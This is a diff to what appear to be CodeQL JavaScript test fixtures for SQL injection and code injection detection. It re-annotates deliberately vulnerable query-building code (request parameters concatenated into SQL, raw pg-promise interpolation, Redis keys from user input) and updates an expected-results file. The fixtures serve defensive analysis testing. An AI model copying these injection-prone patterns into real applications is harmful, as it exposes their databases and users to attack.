@@ -3,20 +3,20 @@ const mysql = require('mysql'); const pool = mysql.createPool(getConfig()); app.get("search", function handler(req, res) { - let temp = req.params.value; + let temp = req.params.value; // $ Source pool.getConnection(function(err, connection) { connection.query({ - sql: 'SELECT * FROM `books` WHERE `author` = ?', // OK + sql: 'SELECT * FROM `books` WHERE `author` = ?', values: [temp] }, function(error, results, fields) {}); }); pool.getConnection(function(err, connection) { connection.query({ - sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // NOT OK + sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert }, function(error, results, fields) {}); }); pool.getConnection(function(err, connection) { - connection.query('SELECT * FROM `books` WHERE `author` = ' + temp, // NOT OK + connection.query('SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert function(error, results, fields) {}); }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts index eaf46ad8cf85..759bc3e49476 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts @@ -4,8 +4,8 @@ export class Foo { db: IDatabase; onRequest(req, res) { - let taint = req.params.x; - this.db.one(taint); // NOT OK + let taint = req.params.x; // $ Source + this.db.one(taint); // $ Alert res.end(); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js index d3f190dd1980..3d5e3cce7f0c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js 
@@ -4,63 +4,63 @@ require('express')().get('/foo', (req, res) => { const db = pgp(process.env['DB_CONNECTION_STRING']); var query = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='" - + req.params.category + "' ORDER BY PRICE"; + + req.params.category + "' ORDER BY PRICE"; // $ Source - db.any(query); // NOT OK - db.many(query); // NOT OK - db.manyOrNone(query); // NOT OK - db.map(query); // NOT OK - db.multi(query); // NOT OK - db.multiResult(query); // NOT OK - db.none(query); // NOT OK - db.one(query); // NOT OK - db.oneOrNone(query); // NOT OK - db.query(query); // NOT OK - db.result(query); // NOT OK + db.any(query); // $ Alert + db.many(query); // $ Alert + db.manyOrNone(query); // $ Alert + db.map(query); // $ Alert + db.multi(query); // $ Alert + db.multiResult(query); // $ Alert + db.none(query); // $ Alert + db.one(query); // $ Alert + db.oneOrNone(query); // $ Alert + db.query(query); // $ Alert + db.result(query); // $ Alert db.one({ - text: query // NOT OK + text: query // $ Alert }); db.one({ - text: 'SELECT * FROM news where id = $1', // OK - values: req.params.id, // OK + text: 'SELECT * FROM news where id = $1', + values: req.params.id, }); db.one({ text: 'SELECT * FROM news where id = $1:raw', - values: req.params.id, // NOT OK - interpreted as raw parameter + values: req.params.id, // $ Alert - interpreted as raw parameter }); db.one({ text: 'SELECT * FROM news where id = $1^', - values: req.params.id, // NOT OK + values: req.params.id, // $ Alert }); db.one({ text: 'SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3', values: [ - req.params.id, // NOT OK - req.params.name, // NOT OK + req.params.id, // $ Alert + req.params.name, // $ Alert req.params.foo, // OK - not using raw interpolation ] }); db.one({ text: 'SELECT * FROM news where id = ${id}:raw AND name = ${name}', values: { - id: req.params.id, // NOT OK + id: req.params.id, // $ Alert name: req.params.name, // OK - not using raw interpolation } }); db.one({ text: 
"SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE \"%${title}:value%\"", values: { - id: req.params.id, // NOT OK + id: req.params.id, // $ Alert name: req.params.name, // OK - :value cannot break out of single quotes - title: req.params.title, // NOT OK - enclosed by wrong type of quote + title: req.params.title, // $ Alert - enclosed by wrong type of quote } }); db.task(t => { - return t.one(query); // NOT OK + return t.one(query); // $ Alert }); db.taskIf( - { cnd: t => t.one(query) }, // NOT OK - t => t.one(query) // NOT OK + { cnd: t => t.one(query) }, // $ Alert + t => t.one(query) // $ Alert ); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js index 44a628a3c9e8..dda3cea18fac 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js 
@@ -7,47 +7,47 @@ const app = Express(); app.use(require('body-parser').json()); app.post('/documents/find', (req, res) => { - client.set(req.body.key, "value"); // NOT OK + client.set(req.body.key, "value"); // $ Alert - var key = req.body.key; + var key = req.body.key; // $ Source if (typeof key === "string") { - client.set(key, "value"); // OK + client.set(key, "value"); client.set(["key", "value"]); } - client.set(key, "value"); // NOT OK - client.hmset("key", "field", "value", key, "value2"); // NOT OK + client.set(key, "value"); // $ Alert + client.hmset("key", "field", "value", key, "value2"); // $ Alert // chain commands client .multi() .set("constant", "value") - .set(key, "value") // NOT OK - .get(key) // OK + .set(key, "value") // $ Alert + .get(key) .exec(function (err, replies) { }); client.duplicate((err, newClient) => { - newClient.set(key, "value"); // NOT OK + newClient.set(key, "value"); // $ Alert }); - client.duplicate().set(key, "value"); // NOT OK + client.duplicate().set(key, "value"); // $ Alert }); import { promisify } from 'util'; app.post('/documents/find', (req, res) => { - const key = req.body.key; - client.set(key, "value"); // NOT OK + const key = req.body.key; // $ Source + client.set(key, "value"); // $ Alert const setAsync = promisify(client.set).bind(client); - const foo1 = setAsync(key, "value"); // NOT OK + const foo1 = setAsync(key, "value"); // $ Alert client.setAsync = promisify(client.set); - const foo2 = client.setAsync(key, "value"); // NOT OK + const foo2 = client.setAsync(key, "value"); // $ Alert client.unrelated = promisify(() => {}); - const foo3 = client.unrelated(key, "value"); // OK + const foo3 = client.unrelated(key, "value"); const unrelated = promisify(client.foobar).bind(client); - const foo4 = unrelated(key, "value"); // OK + const foo4 = unrelated(key, "value"); }); \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/socketio.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/socketio.js index 494e2cb61089..5398d2d74e74 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/socketio.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/socketio.js @@ -7,7 +7,7 @@ var db = new sqlite3.Database(':memory:'); var io = require('socket.io')(); io.on('connection', (socket) => { - socket.on('newuser', (handle) => { - db.run(`INSERT INTO users(name) VALUES ${handle}`); + socket.on('newuser', (handle) => { // $ Source + db.run(`INSERT INTO users(name) VALUES ${handle}`); // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst.js index 3b4d8ea6943c..0f5b6f992263 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst.js @@ -7,5 +7,5 @@ var db = new sqlite3.Database(':memory:'); var app = express(); app.get('/post/:id', function(req, res) { - db.get('SELECT * FROM Post WHERE id = "' + req.params.id + '"'); + db.get('SELECT * FROM Post WHERE id = "' + req.params.id + '"'); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js index b28ddabc9ca6..c68c7d295ca7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js @@ -3,8 +3,7 @@ const sql = require('mssql'); var app = express(); app.get('/post/:id', async function(req, res) { - // OK + sql.query`select * from mytable where id = ${req.params.id}`; - // NOT OK - new sql.Request().query("select * from mytable where id = '" + req.params.id + "'"); + new sql.Request().query("select * from mytable where id = '" + req.params.id + "'"); // $ Alert }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js index 3f9aa21355d1..631dcb2faae3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js @@ -5,12 +5,12 @@ const pool = new pg.Pool(config); function handler(req, res) { var query1 = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='" - + req.params.category + "' ORDER BY PRICE"; - pool.query(query1, [], function(err, results) { // BAD: the category might have SQL special characters in it + + req.params.category + "' ORDER BY PRICE"; // $ Source + pool.query(query1, [], function(err, results) { // $ Alert - the category might have SQL special characters in it // process results }); - // GOOD: use parameters + // OK - use parameters var query2 = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1" + " ORDER BY PRICE"; pool.query(query2, [req.params.category], function(err, results) { diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst4.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst4.js index 73cddfb3a6ae..656dd5345a70 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst4.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst4.js @@ -5,5 +5,5 @@ var db = new sqlite3.Database(':memory:'); angular.module('myApp', ['ngRoute']) .controller('FindPost', function($routeParams) { - db.get('SELECT * FROM Post WHERE id = "' + $routeParams.id + '"'); + db.get('SELECT * FROM Post WHERE id = "' + $routeParams.id + '"'); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected index e536c54dbd2f..a81b9dbcce0f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected 
+++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected 
@@ -1,15 +1,80 @@ +#select +| NoSQLCodeInjection.js:18:24:18:37 | req.body.query | NoSQLCodeInjection.js:18:24:18:31 | req.body | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | This code execution depends on a $@. | NoSQLCodeInjection.js:18:24:18:31 | req.body | user-provided value | +| NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | NoSQLCodeInjection.js:19:36:19:43 | req.body | NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | This code execution depends on a $@. | NoSQLCodeInjection.js:19:36:19:43 | req.body | user-provided value | +| NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | NoSQLCodeInjection.js:22:36:22:43 | req.body | NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | This code execution depends on a $@. | NoSQLCodeInjection.js:22:36:22:43 | req.body | user-provided value | +| actions.js:4:10:4:50 | github. ... message | actions.js:4:10:4:50 | github. ... message | actions.js:4:10:4:50 | github. ... message | This code execution depends on a $@. | actions.js:4:10:4:50 | github. ... message | user-provided value | +| angularjs.js:10:22:10:36 | location.search | angularjs.js:10:22:10:36 | location.search | angularjs.js:10:22:10:36 | location.search | This code execution depends on a $@. | angularjs.js:10:22:10:36 | location.search | user-provided value | +| angularjs.js:13:23:13:37 | location.search | angularjs.js:13:23:13:37 | location.search | angularjs.js:13:23:13:37 | location.search | This code execution depends on a $@. | angularjs.js:13:23:13:37 | location.search | user-provided value | +| angularjs.js:16:28:16:42 | location.search | angularjs.js:16:28:16:42 | location.search | angularjs.js:16:28:16:42 | location.search | This code execution depends on a $@. | angularjs.js:16:28:16:42 | location.search | user-provided value | +| angularjs.js:19:22:19:36 | location.search | angularjs.js:19:22:19:36 | location.search | angularjs.js:19:22:19:36 | location.search | This code execution depends on a $@. 
| angularjs.js:19:22:19:36 | location.search | user-provided value | +| angularjs.js:22:27:22:41 | location.search | angularjs.js:22:27:22:41 | location.search | angularjs.js:22:27:22:41 | location.search | This code execution depends on a $@. | angularjs.js:22:27:22:41 | location.search | user-provided value | +| angularjs.js:25:23:25:37 | location.search | angularjs.js:25:23:25:37 | location.search | angularjs.js:25:23:25:37 | location.search | This code execution depends on a $@. | angularjs.js:25:23:25:37 | location.search | user-provided value | +| angularjs.js:28:33:28:47 | location.search | angularjs.js:28:33:28:47 | location.search | angularjs.js:28:33:28:47 | location.search | This code execution depends on a $@. | angularjs.js:28:33:28:47 | location.search | user-provided value | +| angularjs.js:31:28:31:42 | location.search | angularjs.js:31:28:31:42 | location.search | angularjs.js:31:28:31:42 | location.search | This code execution depends on a $@. | angularjs.js:31:28:31:42 | location.search | user-provided value | +| angularjs.js:34:18:34:32 | location.search | angularjs.js:34:18:34:32 | location.search | angularjs.js:34:18:34:32 | location.search | This code execution depends on a $@. | angularjs.js:34:18:34:32 | location.search | user-provided value | +| angularjs.js:40:18:40:32 | location.search | angularjs.js:40:18:40:32 | location.search | angularjs.js:40:18:40:32 | location.search | This code execution depends on a $@. | angularjs.js:40:18:40:32 | location.search | user-provided value | +| angularjs.js:44:17:44:31 | location.search | angularjs.js:44:17:44:31 | location.search | angularjs.js:44:17:44:31 | location.search | This code execution depends on a $@. | angularjs.js:44:17:44:31 | location.search | user-provided value | +| angularjs.js:47:16:47:30 | location.search | angularjs.js:47:16:47:30 | location.search | angularjs.js:47:16:47:30 | location.search | This code execution depends on a $@. 
| angularjs.js:47:16:47:30 | location.search | user-provided value | +| angularjs.js:50:22:50:36 | location.search | angularjs.js:50:22:50:36 | location.search | angularjs.js:50:22:50:36 | location.search | This code execution depends on a $@. | angularjs.js:50:22:50:36 | location.search | user-provided value | +| angularjs.js:53:32:53:46 | location.search | angularjs.js:53:32:53:46 | location.search | angularjs.js:53:32:53:46 | location.search | This code execution depends on a $@. | angularjs.js:53:32:53:46 | location.search | user-provided value | +| express.js:6:24:6:69 | "return ... + "];" | express.js:6:44:6:62 | req.param("wobble") | express.js:6:24:6:69 | "return ... + "];" | This code execution depends on a $@. | express.js:6:44:6:62 | req.param("wobble") | user-provided value | +| express.js:7:34:7:79 | "return ... + "];" | express.js:7:54:7:72 | req.param("wobble") | express.js:7:34:7:79 | "return ... + "];" | This code execution depends on a $@. | express.js:7:54:7:72 | req.param("wobble") | user-provided value | +| express.js:9:8:9:53 | "return ... + "];" | express.js:9:28:9:46 | req.param("wobble") | express.js:9:8:9:53 | "return ... + "];" | This code execution depends on a $@. | express.js:9:28:9:46 | req.param("wobble") | user-provided value | +| express.js:11:22:11:54 | req.par ... ction") | express.js:11:22:11:54 | req.par ... ction") | express.js:11:22:11:54 | req.par ... ction") | This code execution depends on a $@. | express.js:11:22:11:54 | req.par ... ction") | user-provided value | +| express.js:12:30:12:53 | req.par ... cript") | express.js:12:30:12:53 | req.par ... cript") | express.js:12:30:12:53 | req.par ... cript") | This code execution depends on a $@. | express.js:12:30:12:53 | req.par ... cript") | user-provided value | +| express.js:13:37:13:70 | req.par ... odule") | express.js:13:37:13:70 | req.par ... odule") | express.js:13:37:13:70 | req.par ... odule") | This code execution depends on a $@. 
| express.js:13:37:13:70 | req.par ... odule") | user-provided value | +| express.js:14:19:14:48 | req.par ... ntext") | express.js:14:19:14:48 | req.par ... ntext") | express.js:14:19:14:48 | req.par ... ntext") | This code execution depends on a $@. | express.js:14:19:14:48 | req.par ... ntext") | user-provided value | +| express.js:20:34:20:38 | taint | express.js:19:17:19:35 | req.param("wobble") | express.js:20:34:20:38 | taint | This code execution depends on a $@. | express.js:19:17:19:35 | req.param("wobble") | user-provided value | +| express.js:36:15:36:19 | taint | express.js:27:17:27:35 | req.param("wobble") | express.js:36:15:36:19 | taint | This code execution depends on a $@. | express.js:27:17:27:35 | req.param("wobble") | user-provided value | +| express.js:43:10:43:12 | msg | express.js:42:30:42:32 | msg | express.js:43:10:43:12 | msg | This code execution depends on a $@. | express.js:42:30:42:32 | msg | user-provided value | +| module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | This code execution depends on a $@. | module.js:9:16:9:29 | req.query.code | user-provided value | +| module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | This code execution depends on a $@. | module.js:11:17:11:30 | req.query.code | user-provided value | +| react-native.js:8:32:8:38 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:8:32:8:38 | tainted | This code execution depends on a $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | +| react-native.js:10:23:10:29 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:10:23:10:29 | tainted | This code execution depends on a $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | +| react.js:10:56:10:77 | documen ... on.hash | react.js:10:56:10:77 | documen ... 
on.hash | react.js:10:56:10:77 | documen ... on.hash | This code execution depends on a $@. | react.js:10:56:10:77 | documen ... on.hash | user-provided value | +| template-sinks.js:20:17:20:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:20:17:20:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:21:16:21:22 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:21:16:21:22 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:22:18:22:24 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:22:18:22:24 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:23:17:23:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:23:17:23:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:24:18:24:24 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:24:18:24:24 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:25:16:25:22 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:25:16:25:22 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:26:27:26:33 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:26:27:26:33 | tainted | Template, which may contain code, depends on a $@. 
| template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:27:21:27:27 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:27:21:27:27 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:28:17:28:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:28:17:28:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:29:24:29:30 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:29:24:29:30 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:30:21:30:27 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:30:21:30:27 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:31:19:31:25 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:31:19:31:25 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:32:16:32:22 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:32:16:32:22 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| template-sinks.js:33:17:33:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:33:17:33:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | +| tst.js:1:6:1:83 | documen ... t=")+8) | tst.js:1:6:1:27 | documen ... on.href | tst.js:1:6:1:83 | documen ... 
t=")+8) | This code execution depends on a $@. | tst.js:1:6:1:27 | documen ... on.href | user-provided value | +| tst.js:3:12:3:33 | documen ... on.hash | tst.js:3:12:3:33 | documen ... on.hash | tst.js:3:12:3:33 | documen ... on.hash | This code execution depends on a $@. | tst.js:3:12:3:33 | documen ... on.hash | user-provided value | +| tst.js:11:10:11:74 | documen ... , "$1") | tst.js:11:10:11:33 | documen ... .search | tst.js:11:10:11:74 | documen ... , "$1") | This code execution depends on a $@. | tst.js:11:10:11:33 | documen ... .search | user-provided value | +| tst.js:13:21:13:42 | documen ... on.hash | tst.js:13:21:13:42 | documen ... on.hash | tst.js:13:21:13:42 | documen ... on.hash | This code execution depends on a $@. | tst.js:13:21:13:42 | documen ... on.hash | user-provided value | +| tst.js:15:30:15:51 | documen ... on.hash | tst.js:15:30:15:51 | documen ... on.hash | tst.js:15:30:15:51 | documen ... on.hash | This code execution depends on a $@. | tst.js:15:30:15:51 | documen ... on.hash | user-provided value | +| tst.js:17:6:17:46 | atob(do ... ing(1)) | tst.js:17:11:17:32 | documen ... on.hash | tst.js:17:6:17:46 | atob(do ... ing(1)) | This code execution depends on a $@. | tst.js:17:11:17:32 | documen ... on.hash | user-provided value | +| tst.js:19:26:19:53 | locatio ... ring(1) | tst.js:19:26:19:40 | location.search | tst.js:19:26:19:53 | locatio ... ring(1) | This code execution depends on a $@. | tst.js:19:26:19:40 | location.search | user-provided value | +| tst.js:24:18:24:23 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:24:18:24:23 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| tst.js:26:14:26:19 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:26:14:26:19 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| tst.js:28:28:28:33 | source | tst.js:22:18:22:41 | documen ... 
.search | tst.js:28:28:28:33 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| tst.js:30:33:30:38 | source | tst.js:22:18:22:41 | documen ... .search | tst.js:30:33:30:38 | source | This code execution depends on a $@. | tst.js:22:18:22:41 | documen ... .search | user-provided value | +| webix/webix.html:3:16:3:37 | documen ... on.hash | webix/webix.html:3:16:3:37 | documen ... on.hash | webix/webix.html:3:16:3:37 | documen ... on.hash | This code execution depends on a $@. | webix/webix.html:3:16:3:37 | documen ... on.hash | user-provided value | +| webix/webix.html:4:26:4:47 | documen ... on.hash | webix/webix.html:4:26:4:47 | documen ... on.hash | webix/webix.html:4:26:4:47 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.html:4:26:4:47 | documen ... on.hash | user-provided value | +| webix/webix.html:5:47:5:68 | documen ... on.hash | webix/webix.html:5:47:5:68 | documen ... on.hash | webix/webix.html:5:47:5:68 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.html:5:47:5:68 | documen ... on.hash | user-provided value | +| webix/webix.js:3:12:3:33 | documen ... on.hash | webix/webix.js:3:12:3:33 | documen ... on.hash | webix/webix.js:3:12:3:33 | documen ... on.hash | This code execution depends on a $@. | webix/webix.js:3:12:3:33 | documen ... on.hash | user-provided value | +| webix/webix.js:4:22:4:43 | documen ... on.hash | webix/webix.js:4:22:4:43 | documen ... on.hash | webix/webix.js:4:22:4:43 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.js:4:22:4:43 | documen ... on.hash | user-provided value | +| webix/webix.js:5:43:5:64 | documen ... on.hash | webix/webix.js:5:43:5:64 | documen ... on.hash | webix/webix.js:5:43:5:64 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.js:5:43:5:64 | documen ... 
on.hash | user-provided value | edges | NoSQLCodeInjection.js:18:24:18:31 | req.body | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | provenance | | | NoSQLCodeInjection.js:19:36:19:43 | req.body | NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | provenance | | | NoSQLCodeInjection.js:22:36:22:43 | req.body | NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | provenance | | -| express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | provenance | | -| express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | provenance | | -| express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | provenance | | -| express.js:26:9:26:35 | taint | express.js:27:34:27:38 | taint | provenance | | -| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint | provenance | | -| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint | provenance | | -| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint | provenance | | -| express.js:49:30:49:32 | msg | express.js:50:10:50:12 | msg | provenance | | +| express.js:6:44:6:62 | req.param("wobble") | express.js:6:24:6:69 | "return ... + "];" | provenance | | +| express.js:7:54:7:72 | req.param("wobble") | express.js:7:34:7:79 | "return ... + "];" | provenance | | +| express.js:9:28:9:46 | req.param("wobble") | express.js:9:8:9:53 | "return ... 
+ "];" | provenance | | +| express.js:19:9:19:35 | taint | express.js:20:34:20:38 | taint | provenance | | +| express.js:19:17:19:35 | req.param("wobble") | express.js:19:9:19:35 | taint | provenance | | +| express.js:27:9:27:35 | taint | express.js:36:15:36:19 | taint | provenance | | +| express.js:27:17:27:35 | req.param("wobble") | express.js:27:9:27:35 | taint | provenance | | +| express.js:42:30:42:32 | msg | express.js:43:10:43:12 | msg | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:8:32:8:38 | tainted | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:10:23:10:29 | tainted | provenance | | | react-native.js:7:17:7:33 | req.param("code") | react-native.js:7:7:7:33 | tainted | provenance | | 
@@ -28,17 +93,17 @@ edges | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:32:16:32:22 | tainted | provenance | | | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:33:17:33:23 | tainted | provenance | | | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:18:9:18:31 | tainted | provenance | | -| tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) | provenance | | -| tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") | provenance | | -| tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:11:23:45 | documen ... ring(1) | provenance | | -| tst.js:23:11:23:45 | documen ... ring(1) | tst.js:23:6:23:46 | atob(do ... ing(1)) | provenance | | -| tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 | locatio ... ring(1) | provenance | | -| tst.js:29:9:29:82 | source | tst.js:31:18:31:23 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:33:14:33:19 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:35:28:35:33 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:37:33:37:38 | source | provenance | | -| tst.js:29:18:29:41 | documen ... .search | tst.js:29:18:29:82 | documen ... , "$1") | provenance | | -| tst.js:29:18:29:82 | documen ... , "$1") | tst.js:29:9:29:82 | source | provenance | | +| tst.js:1:6:1:27 | documen ... on.href | tst.js:1:6:1:83 | documen ... t=")+8) | provenance | | +| tst.js:11:10:11:33 | documen ... .search | tst.js:11:10:11:74 | documen ... , "$1") | provenance | | +| tst.js:17:11:17:32 | documen ... on.hash | tst.js:17:11:17:45 | documen ... ring(1) | provenance | | +| tst.js:17:11:17:45 | documen ... ring(1) | tst.js:17:6:17:46 | atob(do ... ing(1)) | provenance | | +| tst.js:19:26:19:40 | location.search | tst.js:19:26:19:53 | locatio ... 
ring(1) | provenance | | +| tst.js:22:9:22:82 | source | tst.js:24:18:24:23 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:26:14:26:19 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:28:28:28:33 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:30:33:30:38 | source | provenance | | +| tst.js:22:18:22:41 | documen ... .search | tst.js:22:18:22:82 | documen ... , "$1") | provenance | | +| tst.js:22:18:22:82 | documen ... , "$1") | tst.js:22:9:22:82 | source | provenance | | nodes | NoSQLCodeInjection.js:18:24:18:31 | req.body | semmle.label | req.body | | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | semmle.label | req.body.query | 
@@ -61,24 +126,24 @@ nodes | angularjs.js:47:16:47:30 | location.search | semmle.label | location.search | | angularjs.js:50:22:50:36 | location.search | semmle.label | location.search | | angularjs.js:53:32:53:46 | location.search | semmle.label | location.search | -| express.js:7:24:7:69 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:7:44:7:62 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:9:34:9:79 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:9:54:9:72 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:12:8:12:53 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:12:28:12:46 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:15:22:15:54 | req.par ... ction") | semmle.label | req.par ... ction") | -| express.js:17:30:17:53 | req.par ... cript") | semmle.label | req.par ... cript") | -| express.js:19:37:19:70 | req.par ... odule") | semmle.label | req.par ... odule") | -| express.js:21:19:21:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | -| express.js:26:9:26:35 | taint | semmle.label | taint | -| express.js:26:17:26:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:27:34:27:38 | taint | semmle.label | taint | 